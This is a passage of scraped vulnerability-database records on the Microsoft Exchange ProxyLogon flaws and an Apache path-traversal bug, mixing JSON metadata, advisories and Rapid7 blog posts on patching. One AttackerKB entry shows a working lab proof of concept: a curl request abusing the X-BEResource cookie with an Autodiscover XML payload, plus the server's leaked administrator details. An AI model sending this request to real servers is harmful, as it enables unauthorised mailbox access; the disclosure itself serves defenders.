BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26855", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T00:00:00", "id": "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "href": "https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-16T15:05:01", "description": "Microsoft disclosed four actively exploited zero-day vulnerabilities being used to attack on-premises versions of Microsoft Exchange Server. The vulnerabilities identified are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which affect Microsoft Exchange Server. Exchange Online is not affected.\n\nIn the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 03, 2021 4:10pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\n**NinjaOperator** at June 29, 2021 9:51pm UTC reported:\n\nMicrosoft [released details](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on an active state-sponsored threat campaign (attributed to HAFNIUM) that is exploiting on-prem Exchange Server installations. Microsoft\u2019s observation was that these were limited, targeted attacks, but as of March 3, 2021, ongoing mass exploitation has been confirmed by multiple sources. More in the [Rapid7 analysis](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=assessment#rapid7-analysis>) tab.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "attackerkb", "title": "Multiple Microsoft Exchange zero-day vulnerabilities - ProxyLogon Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-09T00:00:00", "id": "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "href": "https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---proxylogon-exploit-chain", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-08T21:25:57", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-05-27T15:02:35", "description": "### *Detect date*:\n03/02/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThis vulnerability can be exploited by the following malware:\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 18 \nMicrosoft Exchange Server 2010 Service Pack 3 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2019 Cumulative Update 7\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-26412](<https://nvd.nist.gov/vuln/detail/CVE-2021-26412>) \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) \n[CVE-2021-27078](<https://nvd.nist.gov/vuln/detail/CVE-2021-27078>) \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) \n[CVE-2021-26854](<https://nvd.nist.gov/vuln/detail/CVE-2021-26854>) \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>) \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-26412](<https://vulners.com/cve/CVE-2021-26412>)6.5High \n[CVE-2021-26855](<https://vulners.com/cve/CVE-2021-26855>)7.5Critical \n[CVE-2021-27078](<https://vulners.com/cve/CVE-2021-27078>)6.5High \n[CVE-2021-27065](<https://vulners.com/cve/CVE-2021-27065>)6.8High \n[CVE-2021-26854](<https://vulners.com/cve/CVE-2021-26854>)6.5High \n[CVE-2021-26857](<https://vulners.com/cve/CVE-2021-26857>)6.8High \n[CVE-2021-26858](<https://vulners.com/cve/CVE-2021-26858>)6.8High\n\n### *KB list*:\n[5000871](<http://support.microsoft.com/kb/5000871>) \n[5000978](<http://support.microsoft.com/kb/5000978>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-02T00:00:00", "type": "kaspersky", "title": "KLA12103 ACE vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2022-02-16T00:00:00", "id": "KLA12103", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12103/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. Microsoft has also released [an updated script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that scans Exchange log files for IOCs associated with the vulnerabilities disclosed on March 2, 2021.", "cvss3": {}, "published": "2021-03-03T19:23:42", "type": "rapid7blog", "title": "Mass Exploitation of Exchange Server Zero-Day CVEs: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T19:23:42", "id": "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "href": "https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. One of the major reasons these latest 